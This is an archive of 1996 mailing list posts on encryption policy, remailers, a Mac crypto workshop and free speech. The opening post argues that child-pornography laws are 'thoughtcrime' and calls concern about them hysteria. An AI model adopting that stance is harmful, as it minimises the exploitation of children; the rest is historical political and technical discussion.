protected free speech and need not involve a "pervert." Since the alleged sexual exploitation of children is the one political issue no CongressRodent can afford to be seen as soft on, it is hardly surprising that this single issue will likely be the wedge used to successfully attack protected free speech. > Hold on here.. you are making an invalid comparison. To > my knowledge, there is no law against speaking in favor of > child porn, any more than there is against speaking in favor > of drug usage. It against the law to *use* either of them. But of course we aren't really talking about "speaking in favor of child porn." That's just the buzzword phrase used by the opposing side to characterize any argument against their proposals. We are talking about the right of citizens to privately converse with each other on any topic of their choosing, including through the use of visual material, without government interference. This is independent of the issue of child porn, and who is exploited when money is made through its distribution. > The argument is not dependent upon whether or not actual > children are used, any more than whether or not an actual > gun is used in a robbery - the net effect is the same. > Children are harmed by the promotion of child porn because > it leads to the abuse/exploitation of kids. This is a very vague and spurious connection, much like the suggestion that sympathetic views towards Communism in the '50s would lead to the overthrow of our government. Purging all depictions of adolescent sexuality from our society under threat of imprisonment is hardly a prudent public safety measure. > Let those who believe that they have a constitutional right > to "keep and bear child pornography" violate the various > laws and see if they can prove that their constitutional > rights are violated by the law which proscribes such things. Our constitution would be far better if it had a strong privacy provision, rather than the current First Ammendment. There will always be reasonable exceptions to the notion of absolute freedom of speech, and in every era, people will believe that their own pet issues, (Communism, Child Sex, Abortion Information), should be amongst the special exceptions made. In a country like Sweden, for instance, a constitutional ammendment would be required to ban private possession of any printed material in a citizen's own home. Here, all it takes is some grumbling by the child sex hysterics, and you can go to prison for sitting at your kitchen table with sissors and a jar of paste, and making a collage from selected pieces of the JC Penney Catalog and the latest issue of Playboy. Many so-called child porn laws are easily the silliest examples of the "Tyranny of the Majority" and "thoughtcrime" ever to rear their heads in modern times. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From wsj-announce at interactive.wsj.com Wed Sep 11 17:43:53 1996 From: wsj-announce at interactive.wsj.com (The Wall Street Journal Interactive Edition) Date: Thu, 12 Sep 1996 08:43:53 +0800 Subject: Important News from The Wall Street Journal Interactive Edition Message-ID: <2.2.32.19960911141312.006aabc8@pop.dowjones.com> Dear Wall Street Journal reader: Your trial subscription to The Wall Street Journal Interactive Edition ends in less than two weeks, on Sept. 21, 1996. We hope you've had the chance to explore the Interactive Edition fully during this extensive trial period. If not, visit us today at http://wsj.com. Be sure to check out key features such as Personal Journal, which enables you to create a personalized view of current Journal news, and our extensive Company Briefing Books. A brief tour of our most powerful features is at http://wsj.com/tour.htm. If you wish to continue with your subscription after the trial ends, you don't need to re-register. Just fill out a brief online form and provide us with payment information; we won't charge your credit card until after our trial period is over. An annual subscription costs just $49 a year, or $29 a year if you subscribe to any print edition of The Wall Street Journal. To convert to an annual subscription, just access http://wsj.com and click on the "Convert Now" graphic. If you do not wish to convert to an annual subscription, you do not need to do anything -- you will not be billed and your subscription will be canceled automatically at the end of the trial. You may also be interested in a special offer available to users of Microsoft's Internet Explorer. Microsoft has made arrangements with several premier publishers on the Web, including the Interactive Edition, to offer subscriptions to Internet Explorer users at no charge through the end of this year. If you use the latest release of Internet Explorer as your Web browser, you will be able to keep reading the Interactive Edition through Dec. 31, 1996 and there is no need for you to provide us with payment information at this time. For more information on this offer, you can visit http://wsj.com/ie.html or ask us questions at the e-mail address below. We hope you'll stay with us as a charter annual subscriber. The coming months will see continued progress and expansion on all fronts in the Interactive Edition -- with more Briefing Books, an improved and enhanced Personal Journal, more exclusive news coverage, a greatly expanded search archive and a variety of new tools that we hope will make keeping track of the news easier and more enjoyable. If you have questions or comments, e-mail us at the address below or call Customer Service at 1-800-369-2834 or 1-609-514-0870. Neil Budde Editor The Wall Street Journal Interactive Edition info at interactive.wsj.com -------------------------------------------------------- The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal Interactive Edition (http://wsj.com). If you no longer wish to receive messages from the WSJ-ANNOUNCE3 list, simply reply to this message and in the body of your message type: UNSUBSCRIBE WSJ-ANNOUNCE3 From declan at well.com Wed Sep 11 17:46:04 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 12 Sep 1996 08:46:04 +0800 Subject: The definition of child pornography -- no help here Message-ID: [Note this was before Knox. --Declan] NEW YORK v. FERBER No. 81-55 SUPREME COURT OF THE UNITED STATES 458 U.S. 747; 102 S. Ct. 3348; 1982 U.S. LEXIS 12; 73 L. Ed. 2d 1113; 50 U.S.L.W. 5077; 8 Media L. Rep. 1809 April 27, 1982, Argued July 2, 1982, Decided PRIOR HISTORY: [***1] CERTIORARI TO THE COURT OF APPEALS OF NEW YORK. DISPOSITION: 52 N. Y. 2d 674, 422 N. E. 2d 523, reversed and remanded. SYLLABUS: A New York statute prohibits persons from knowingly promoting a sexual performance by a child under the age of 16 by distributing material which depicts such a performance. The statute defines "sexual performance" as any performance that includes sexual conduct by such a child, and "sexual conduct" is in turn defined as actual or simulated sexual intercourse, deviate sexual intercourse, sexual bestiality, masturbation, sado-masochistic abuse, or lewd exhibition of the genitals. Respondent bookstore proprietor was convicted under the statute for selling films depicting young boys masturbating, and the Appellate Division of the New York Supreme Court affirmed. The New York Court of Appeals reversed, holding that the statute violated the First Amendment as being both underinclusive and overbroad. The court reasoned that in light of the explicit inclusion of an obscenity standard in a companion statute banning the knowing dissemination of similarly defined material, the statute in question could not be construed to include an obscenity standard, [***2] and therefore would prohibit the promotion of materials traditionally entitled to protection under the First Amendment. Held: As applied to respondent and others who distribute similar material, the statute in question does not violate the First Amendment as applied to the States through the Fourteenth Amendment. Pp. 753-774. (a) The States are entitled to greater leeway in the regulation of pornographic depictions of children for the following reasons: (1) the legislative judgment that the use of children as subjects of pornographic materials is harmful to the physiological, emotional, and mental health of the child, easily passes muster under the First Amendment; (2) the standard of Miller v. California, 413 U.S. 15, for determining what is legally obscene is not a satisfactory solution to the child pornography problem; (3) the advertising and selling of child pornography provide an economic motive for and are thus an integral part of the production of such materials, an activity illegal throughout the Nation; (4) the value of permitting live performances and photographic reproductions of children engaged in lewd exhibitions is exceedingly modest, if [***3] not de minimis; and (5) recognizing and classifying child pornography as a category of material outside the First Amendment's protection is not incompatible with this Court's decisions dealing with what speech is unprotected. [...] ****** Copyright (c) 1994 Albany Law Journal of Science & Technology Albany Law Journal of Science & Technology 1994 4 Alb. L.J. Sci. & Tech. 311 LENGTH: 10368 words COMMENTS: WHY THE POSSESSION OF COMPUTER-GENERATED CHILD PORNOGRAPHY CAN BE CONSTITUTIONALLY PROHIBITED David B. Johnson TEXT: [*312] I. INTRODUCTION The computer revolution is sweeping across the world. Like the Industrial Revolution of the nineteenth and early twentieth century, the computer has brought and will continue to bring profound changes to our society. In many instances, computer technology has advanced faster than the laws governing it. n1 Some critics fear that computer technology is growing so fast that "society will be . . . unprepared [to deal with] the moral and legal havoc it will create and the questions it will pose for human identity and privacy." n2 The computer revolution already has brought society its fair share of moral and legal havoc. n3 However, what is to come will tax society's moral and legal systems on an even greater scale. [...] From rah at shipwright.com Wed Sep 11 17:59:24 1996 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Sep 1996 08:59:24 +0800 Subject: Mac Crypto Conf - Debrief Message-ID: --- begin forwarded text Mime-Version: 1.0 Date: Tue, 10 Sep 1996 17:57:05 -0700 To: mac-crypto at thumper.vmeng.com From: Vinnie Moscaritolo Subject: Mac Crypto Conf - Debrief Yow! - We did it.... On Sept 5th & 6th, here on the Cupertino R&D Campus, Robert Hettinga from Shipwright and I ran "The First-Ever-Last-Minute-Under-the-Radar- Ask-Forgiveness-but-Not-Permission Macintosh Cryptography and Internet Commerce Software Development Workshop" This workshop was driven by the copious feedback that I have recieved from developers from both DTS and personal emails, WWDC and MacHack and the Mac-Crypto mailing list. Since the ability to perform Internet Commerce depends heavly on both networking and cryptographic technologies. I started the Mac-Crypto mailing list last March to discuss the implementation of cryptography on the MacOS. We had three major goals for this event: 1) We wanted to provide a vehicle to educate Apple developers and employees who are responsible for Apple's future on the internet about what is going on in the Internet commerce world. We also felt the need to get Internet commerce on Apple's radar. It was clearly on Microsoft's agenda. Developer feedback made it loud and clear that we are losing and have lost developers to other platforms because of it. We are going to fix that. 2) To assist in bridging any disconnect between what the developers have been asking us for and what we are giving them in the internet commerce world. 3) To provide a forum where developers can work together to create internet commerce products for the Macintosh platform. In a manner similar to Quinn's Internet Config, we belived that a lot of this infrastructure can be built by the developers themselves. Highlights: I posted an invite webpage at http://webstuff.apple.com/~opentpt/crypto.html and advertised on several mailing lists, within 10 days I had 84 registrations, about 70 of which showed. Some attendees actually traveled from as far as Scotland. The sessions (in no particular order): * Phil Zimmerman / PGP Inc - Keynote. * Bill Frantz / Periwinkle - Introduction to Cryptography * Maxine Curry / Apple - Crypto Software and the Commerce Dept. * Jon Callas / Apple - Random Numbers on the Mac * Pablo Calamera / Apple - Feedback: Mac Crypto API?: * Sari Harrison / Apple - Feedback: Internet API? * Vinnie Moscaritolo / Apple - Building Fast Network Server Software on MacOS * Quinn / Apple - Internet Config as a Development Model * Vinnie Moscaritolo / Apple - Proposal for bringing back the Mac Keychain * Jay Van Vark / Pacific Coast - How to use electronic commerce * Michel Ranger / Entrust - Certificate and Trust Management * Marc Briceno/Digicash - Digital Cash and Digital Bearer Certificates * Robert Hettinga / Shipwright - A look over the edge * Dave Del Torto - Cypherpunks, MCIP and Mac-Crypto: Marshall Clow a history of crypto activism and the Mac Greg Broiles The sessions were a real sucess. There was a lot of enthusiasm from the developers. The speakers were great. I received comments that the developers found the workshop was very accessible; there was a lot of interaction between the audience and speakers. We allocated plenty of time for Q&A and discussions. They wished that WWDC was more like this. Some of the highlights were: - Phil Zimmerman of PGP fame talked about his plans to build a commercial version of PGP,PGPPhone and CryptDisk on the Mac. And a Mac PGP library that developers can use in their products. - Jon Callas's session generated much excitement. Developers appreciated that his work will be available in source code. - Quinn's session described the hurdles he encountered in shipping Internet Config, one of the most successful pieces of mac software. I would consider this talk a must-watch for any evangelist or product mgr, there is a lot Apple can learn from him. - Sari and Pablo seemed to restored some faith to developers that Apple does listen to their concerns. I got a lot of positive feedback about their willingness to listen to developers. - I gave a talk about what is involved in designing fast network servers with OpenTransport. I wanted to remove any misconception that MacOS is not a good server platform. I outlined the workarounds to some of the problems that existing products have encounted. Thanks to the feedback I received I plan to give this talk again to Apple engineers. - Marc from DigiCash was very knowledgeable about uses for digital cash. One that I was surprised by was to drastically lower bookkeeping costs from internal corporate budget management. Here is an place where Apple could lead. - Robert Hettinga gave a great lecture on the future of commerce and money on the net. It's impossible to talk to him for 10 minutes and not learn something. He is a "natural born evangelist" and would be a great asset to Apple. - Sidhu voluteered to lead an effort to resurect a developers accessable keychain that can be used as a single log-in point to secure services. - There were even a few impromptu sessions from the developers. I wished that more Apple folks could have been there to absorb some of the developer feedback. Luckily Bob and I also worked the video room in between giving our sessions and introductions and were able to tape most of the sessions. I am working on making them available. I will also try to make the slides available on a more permanent webpage in a few days. (I'll post on Mac Crypto) Kudos I want very much to thank the individuals that made this workshop possible. * Robert Hettinga from Shipwright - For his personal time and cost to fly out from Boston, mustering up the developers on the net, assembling the talks, giving the talks, educating us all, doing video booth duty, and everything else. Imagine what we could do with an army of folks like you. (scares me) * Jose Carreon - For understanding the importance and internet commerce to Apple's future and arranging what was needed to make this event happen. * Beth Reed / Yolanda Saldana / Robin Wagner / Richard Ford - For all the help organizing coordinating and firefighting behind the scenes (and holding the bail money). We wouldn't have been able to do it without you. * Cynthia Zwerling - for the fantastic artwork, web design, T-Shirts, and for dealing with all our last minute notices. * And a personal thanks to all the speakers, for taking the time off their busy schedules to give great presentations. * And most of all, a big thank you to the developers for believing in Apple. Ciao. Vinnie Moscaritolo Apple Developer Tech Support http://www.vmeng.com/vinnie/ Fingerprint: 4FA3298150E404F2782501876EA2146A --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From gary at systemics.com Wed Sep 11 18:08:01 1996 From: gary at systemics.com (Gary Howland) Date: Thu, 12 Sep 1996 09:08:01 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: <32371250.3F54BC7E@systemics.com> Mark O. Aldrich wrote: > > While there's dubious wisdom in trying to tell Der Polizei, "I was just > responding to an authorization that I found on the Internet that says it's > OK to phreak your phones - honest," I'd also expect to get paid a hell of > a lot more than $65 for doing a penetration test on their network. Sixty > five bucks won't even pay the per diem, none the less a reasonable wage. These continental europeans tend to type '.' instead of commas, and ',' instead of points when they write numbers. (They also have funny ones and sevens, but that's a another story.) I thought the offer of 100,000 DM very respectable, and a tad unusual for a [usually conservative] telecoms company. It sure beats baseball caps and T-shirts. > And Der Polizei is *NOT* known for having a sense of humor about anything, > at any time, with anyone. I 100% agree ... > Remember, kids, they may look like shit in > uniform, but those automatic weapons they carry are real, so's the ammo, > and they know how to use both of 'em. ... but the semi automatics they carry are not much different to ones US cops have. > And *I'll* decide if and when I want to give it to charity, just like I do > with the rest of my salary, thank you.... And *they'll* decide what sort of deal *they* want to offer. They did say the money could be donataed to any non-profit organisation, so this covers a wide range of organisations (your school or university perhaps, or computer society, or even the Church of Scientology, The Vatican, Mitre Corp, NFL, etc. etc.). I wonder if Radikal is a non-profit :-) Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From jimbell at pacifier.com Wed Sep 11 18:12:28 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 12 Sep 1996 09:12:28 +0800 Subject: ALERT: Call the Commerce committee! 1-800-962-3524 Message-ID: <199609111741.KAA18899@mail.pacifier.com> checking my files and verifying the number this morning, I find that there is an active 1-800 number to call Congress. (Don't know who'se it is, but it reaches the Congressional switchboard...) The Capitol Switchboard can be reached at 1-800-962-3524. At 12:42 AM 9/11/96 -0400, Voters Telecommunications Watch wrote: >======================================================================== > > SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION > WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE > > OFFICES ARE RECEIVING 'LOTS OF CALLS' > MAKE A CALL TO THE COMMERCE COMMITTEE > > September 11, 1996 > > Please widely redistribute this document with this banner intact > until September 30, 1996 > >________________________________________________________________________ >CONTENTS > The Latest News > What You Can Do Now > Background / What To Expect This Week > Description of S.1726, Pro-CODE Bill > Chronology of Pro-Crypto Legislation > For More Information / Supporting Organizations > >________________________________________________________________________ >THE LATEST NEWS > >Sometimes things work out better than imagined. This was the feeling >tonight as I waded through my email from people all over the country that >called the commerce committee. This was the feeling as I heard from visitors >to one Senator's office who, while waiting for a few minutes in the lobby, >listened to the receptionist take two quick calls from netizens calling >about the bill. > >Receptionist, cutting the caller off: "S.1726? Yes, I'll pass that along >to the Senator, thanks. We've been getting a lot of calls." > >Another netizen emailed us saying that he also called his Representative. >It turns out this Rep. has some friends who have co-sponsored HR 3011, the >House version of Pro-CODE. The calls and elevated publicity from this phone >campaign have convinced him to consider co-sponsoring HR 3011. > >This is great, but our success has mobilized the anti-crypto forces >into action as well. The Clinton Administration, who has long opposed >the right of citizens to use non-Clipper encryption, has begun working >behind the scenes to make sure that the vote on Pro-CODE (S.1726) never >happens. > >To have the Senate Commerce committee go on record that encryption exports >should be loosened, against the will of the Administration, would be >an embarrassment to the White House. They have begun pushing hard to >pressure Democratic Commerce Committee members to put the brakes on the >bill, and do everything they can to prevent the vote this Thursday. > >To see the business community, the industry, and the public line up the >Administration would be extremely hard to take and still seem >credible. > >It's crucial that we continue to make noise and ring those phones. By >pulling enough favors with members of the Senate Commerce Committee, it's >possible that the White House could prevent this vote from happening. > >WE MUST NOT LET THAT HAPPEN. Appropriately forward this to everyone you >know until the expiration listed above. Go to work, bug your neighbor >in the cubicle or office next to you. Have they called yet? Bug them >until they do. Call the rest of the members you haven't gotten around to >yet. > >And don't forget to sign the petition at http://www.crypto.com/petition/ ! > >[Rest of alert is the same from last time] >________________________________________________________________________ >WHAT YOU CAN DO NOW > >It's crucial that you call the Commerce committee members below and >urge them to pass S.1726 out of committee without amendments. (This is >also known as a "clean" bill.) Any opportunity for amendments (even if >they are good) opens us up to the possibility of hostile amendments >that could restrict the use of encryption even further than today's >abysmal state. It could even prohibit the use of encryption without >Clipper Chip-like key 'escrow' technology, which includes built-in >surveillance and monitoring functionality. > >1. Call/Fax the members of the Senate Commerce committee and urge > them to pass S.1726 out of committee "cleanly". Do not use email, > as it is not likely to be looked at in time to make a difference > for the markup on September 12th. > > Use the sample communique and directory listing below to make it a > simple TWO MINUTE task. > >2. Sign the petition to support strong encryption at > http://www.crypto.com/petition/ ! Join other cyber-heroes as > Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and > others who have also signed. > >3. Between now and Wed. September 12, it is crucial that you call all > these members of Congress. > > P ST Name and Address Phone Fax > = == ======================== ============== ============== > D SC Hollings, Ernest F. 1-202-224-6121 1-202-224-4293 > D MA Kerry, John F. 1-202-224-2742 1-202-224-8525 > D HI Inouye, Daniel K. 1-202-224-3934 1-202-224-6747 > D KY Ford, Wendell H. 1-202-224-4343 1-202-224-0046 > D WV Rockefeller, John D. 1-202-224-6472 1-202-224-7665 > D LA Breaux, John B. 1-202-224-4623 1-202-228-2577 > D NV Bryan, Richard H. 1-202-224-6244 1-202-224-1867 > D ND Dorgan, Byron L. 1-202-224-2551 1-202-224-1193 > D NE Exon, J. J. 1-202-224-4224 1-202-224-5213 > D OR Wyden, Ron* 1-202-224-5244 1-202-228-2717 > > R SD Pressler, Larry* 1-202-224-5842 1-202-224-1259 > R MT Burns, Conrad R.(*sponsor) 1-202-224-2644 1-202-224-8594 > R AK Stevens, Ted 1-202-224-3004 1-202-224-2354 > R AZ McCain, John 1-202-224-2235 1-202-228-2862 > R WA Gorton, Slade 1-202-224-3441 1-202-224-9393 > R MS Lott, Trent* 1-202-224-6253 1-202-224-2262 > R TX Hutchison, Kay Bailey 1-202-224-5922 1-202-224-0776 > R ME Snowe, Olympia 1-202-224-5344 1-202-224-1946 > R MO Ashcroft, John* 1-202-224-6154 1-202-228-0998 > R TN Frist, Bill 1-202-224-3344 1-202-228-1264 > R MI Abraham, Spencer 1-202-224-4822 1-202-224-8834 > > * supporter or cosponsor. The bill also enjoys broad bi-partisan > support from members not on the committee including Senators Leahy > (D-VT) and Murray (D-WA). > >4. Here is a sample conversation: > > SAMPLE PHONE CALL > You: > Sen:Hello, Senator Mojo's office! > > You: > >SAY I'm calling to urge the Senator to pass S.1726, the >THIS-> Burns/Leahy/Pressler bill, S.1726 when the committee votes on > it on Thursday. It's critical to the future of privacy, security, > and electronic commerce on the internet. > > Sen:Ok, thanks! > > IF THEY SAY > "The Senator has concerns about the bill", > please answer, > "Please try to work these issues out as it moves to the Senate floor, > but passage out of committee will send an important signal to > the Administration." > >5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM > YOU. Please tell us who you called, and how they sounded. We'll be > passing this information to folks in D.C. who can help apply pressure > where needed. > > $ Mail vtw at vtw.org > Subject: I called so-and-so > > Hey, I called Sen. Mojo. He sounded iffy, call in the > reinforcements. > ^D > >6. Forward this to your friends and colleagues in appropriate forums > until the date of expiration at the top. Forward a copy of this to > your Internet Service Provider as well, and ask them to put the following > text in their message of the day (motd), or on their WWW page: > > ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT > > The U.S. Senate will be voting on a proposal to encourage > better security on the Internet on Thu Sep. 12th. Your help is > needed to call Congress. See http://www.crypto.com/ for more > details. > > ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT > >________________________________________________________________________ >BACKGROUND / WHAT TO EXPECT THIS WEEK > >For the past 3 years, Cyber-Rights Activists, citizens, and industry >leaders have been working hard to reform US encryption policy. > >Support has been building behind several legislative proposals this >year because they send a clear signal to the Administration about the >need for security and privacy in the Information Age. The digital >revolution is currently being held hostage by the White House's Cold >War restrictions on privacy-enhancing encryption technology. > >Now, with Congress less than a month away from adjournment, everyone >who supports encryption and privacy is working to see this bill leave >committee in order to send a clear message to the White House that they >are on the wrong side of the encryption issue. Although this bill may >not become law this year, its passage out of committee will be a >landmark event that will clearly tell the White House that the >Congress, the public, and the computer industry care about security and >privacy, and need strong, reliable encryption technology in order to >make the Internet a viable platform for commerce, education, and >democracy. > >Success for our side is not certain, and the next week is not without risks. >On September 12th, the Senate Commerce committee will hold a "markup", >where the bill is examined, voted on, and if there are enough votes, >passed out of committee. Two things could happen: > > -the committee could pass the bill as written, > -the committee could pass the bill with amendments. > >Any amendments are not likely to be friendly, and in particular, quiet >sources have told privacy activists that the Clinton Administration has been >readying a legislative assault on your right to use encryption for several >weeks now. A Clipper-like amendment could be attached to the bill if >our side does not have enough votes to block all amendments. > >It is crucial that all netizens who consider privacy and security important >take a moment to call members of the Commerce Committee right now and >urge them to vote S.1726 out of committee without amendments. > >________________________________________________________________________ >DESCRIPTION OF S.1726, PRO-CODE BILL > >Privacy-enhancing encryption technology is currently under heavy restrictions >kept in place by the White House. Encryption that is currently allowed to >be exported is not sufficient to protect confidential information. This >policy acquires an "Alice-in-Wonderland" quality when one realizes that >strong encryption products are available abroad both for sale and for free >download off the Internet. > >The Pro-CODE Act resolves to: > >1. Allow for the *unrestricted* export of "mass-market" or "public-domain" > encryption programs, including such products as Pretty Good Privacy and > popular World Wide Web browsers. > >2. Requires the Secretary of Commerce to allow the less restricted export > of other encryption technologies if products of similar strength are > generally available outside the United States, roughly up to DES > strength. > >3. Prohibits the federal government from imposing mandatory key-escrow > encryption policies on the domestic market and limiting the authority > of the Secretary of Commerce to set standards for encryption products. > >________________________________________________________________________ >CHRONOLOGY OF PRO-CRYPTO LEGISLATION > >9/12/96 (scheduled) >Senate Commerce committee will hold markup of S.1726 and hopefully pass it >out of committee with no amendments. > >7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. >FBI Director Louis Freeh testifies along with many cyber-luminaries. >Hearings are cybercast Internet Cyber-Rights activists with HotWired >and WWW.Crypto.Com. You can see the photos, read the testimony, and >listen to the audio transcript at http://www.crypto.com/events/072596/ > >6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are >cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. >You can see the photos, read the testimony, and listen to the audio >transcript at http://www.crypto.com/events/062696/ > >5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would >free public-domain encryption software (such as PGP) for export, free much >commercial encryption for export, and reduce the government's ability to >push Clipper proposals down the throats of an unwilling public. Original >sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), >Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). > >3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills >(S.1587/H.R.3011) that significantly relax export restrictions on products >with encryption functionality in them, as well as free public domain software >such as PGP (Pretty Good Privacy). > >________________________________________________________________________ >FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS > >There are many excellent resources online to get up to speed on crypto >including the following WWW sites: > >http://www.crypto.com http://www.privacy.org http://www.eff.org >http://www.cdt.org http://www.epic.org http://www.vtw.org > >Please visit them often. > >The following organizations have signed onto this alert: > > Center for Democracy and Technology > Electronic Frontier Foundation > Electronic Privacy Information Center > Voters Telecommunications Watch > >________________________________________________________________________ >End alert >======================================================================== > > Jim Bell jimbell at pacifier.com From tcmay at got.net Wed Sep 11 18:23:29 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 09:23:29 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: At 4:56 PM 9/11/96, Bill Frantz wrote: >Let me float one more hair-brained idea. I think Tim May is right in >saying that the most secure response technique is the one in Blacknet. >i.e. The response are posted to some public bulletin board, and then Alice >reads them at her leisure. > >I see two problems with this approach: (1) It doesn't scale well, and (2) >Alice's reading of the response may be detected. (I think of the vans in >Great Britain which listen to the local oscillator frequency of TV sets to >find what people are watching.) I agree that message pools have interesting scaling problems. If most messages are in the same large pool, and lots of people are using pools, then that pool could become very, very large. However, we are many _years_ away from this situation, and a very large number of _text_ messages (as opposed to JPEGs) can be put in a few dozen megabytes of pool space. I contend that many "scaling problems" turn out to be relatively unimportant, for various reasons. (And scaling problems should not be a reason not to deploy a simple system...odds are that other factors will enter long before the system breaks. The Xanadu people may have worried too much about hypertext database scaling problems, while the more straightforward HTML/URL hypertext scheme actually got deployed and changed the playing field completely.) There are also likely to be various kinds of pools, thus partly solving the scaling problem by hierarchies. (This could worse the traffic analysis--who is reading what--problem, though.) On the traffic analysis problem, I also think this is overrated as a risk. The likelihood that the TLAs could figure out which of the messages in "alt.anonymous.messages" I am actually interested in are small. And there are PageSat-type distribution systems, @Home-type cable distribution systems, etc. (My DSS satellite has provisions for a digital feed...it is reported to be coming soon.) Reply-blocks are a _clear_ problem, while message pools have various basic advantages. I would worry more about scaling when volume is 1000 times what it now is. (And digital postage solves a lot of scaling problems.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From maldrich at grci.com Wed Sep 11 18:31:03 1996 From: maldrich at grci.com (Mark O. Aldrich) Date: Thu, 12 Sep 1996 09:31:03 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: On Wed, 11 Sep 1996, [ISO-8859-1] J�ri Kaljundi wrote: > Actually 65.000$ is pronounced sixty five thousand dollars not sixty five > dollars, at least in Eastern and Central Europe. > Ok, Juri - you win the award of having been the FIRST of the 875,00 (actually, 27 - count 'em, 27) people who sent me mail to say that in Europe they use a comma, not a period, for their decimal point. Sorry to all of the rest of you who entered the contest, but you don't win squat. Juri, you don't win squat either, but you do get this nifty little proclamation that you were the very first. After having traveled in Europe, I was certainly familiar with the difference in the notation. You also think, however, that I would have paid more attention to what the hell I was reading before I shot off my mouth (via my keyboard), but I didn't. I think this is called a "brain fart" (note to our European brothers and sisters - over there, I think you call it a "mental fugue" or "Parliamentary election," I'm nor sure which). This concludes our contest of the day. I would like to thank EACH and EVERY one of you who contributed an entry. No further submissions will be accepted. Void where prohibited. BTW, $65,000.00 USD (translate per local convention as necessary) is *STILL* not enough to a) go up against the German police, and b) fund a penetration attack that would bring about the opportunity to play with really cool toys. After all, screw the profit or charity, right? When it's all said and done, IT'S THE TOYS THAT REALLY MATTER. ------------------------------------------------------------------------- |And if Dole wins and dies in office, they| Mark Aldrich | |could just pickle him and no one would | GRCI INFOSEC Engineering | |notice. It wouldn't be the first time we| maldrich at grci.com | |had a dill-dole running the country. | MAldrich at dockmaster.ncsc.mil| | -- Alan Olsen | | |_______________________________________________________________________| |The author is PGP Empowered. Public key at: finger maldrich at grci.com | | The opinions expressed herein are strictly those of the author | | and my employer gets no credit for them whatsoever. | ------------------------------------------------------------------------- From smith at sctc.com Wed Sep 11 18:31:24 1996 From: smith at sctc.com (Rick Smith) Date: Thu, 12 Sep 1996 09:31:24 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609112256.RAA09825@shade.sctc.com> Tim wrote: : Declan answers in the affirmative that, yes, nearly all of the examples I : cited are indeed crimes. .... : As I well knew, which is why I presented them. (The Jock Sturges case was : in SF, ... I've read in several places that the Jock Sturges case was thrown out of court by the judge. Nobody has dragged me away in shackles for owning "Radiant Images." Stores selling photo books often carry his work, and it is rarely covered with opaque plastic. So it may be nudity that set the gendarmes (sp?) in motion, but that's evidently not what's really illegal. I wonder what would happen if an "adult magazine" were to reproduce Sturges' work. The court case might be interesting... Now apply that to the Web. Imagine there's a Sturges site, and a porn site links to it. Does that make the Sturges material "child porn?" If so, is the porn site illegal or the Sturges site? I suspect the prosecutors will come down on both and let the courts sort it out. Prior restraint, eh? : ...the "little girls in leotards" case was only a few years ago, etc.) Don't know about that one. Is it illegal for little girls to be photographed in leotards now? "Nutcracker" is X rated? Move over, Bambi. Personally, I think the political posturing theory captures the essence of the legislative climate. Rick. From live at excite.com Wed Sep 11 18:33:17 1996 From: live at excite.com (live at excite.com) Date: Thu, 12 Sep 1996 09:33:17 +0800 Subject: Your Excite Live! page Message-ID: <199609112256.PAA19540@jiff.> A request was made for the location of your Excite Live! page Found your Excite Live at URL http://live.excite.com/?uid=CEC8C99632372D6E From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 11 18:48:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 12 Sep 1996 09:48:37 +0800 Subject: RRE: Digital Objects Identifiers Message-ID: <01I9CWTXLIZC9ULNWE@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 10-SEP-1996 23:06:58.45 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Mon, 9 Sep 1996 15:59:26 -0400 (EDT) From: Paul Evan Peters To: Multiple recipients of list Subject: Digital Objects Identifiers Dear CNI-Announce subscribers: I thought that you would like to have the attached brought to your attention, especial so since: o it deals with a critical technical issue in the evolution of the networked information environment, and o 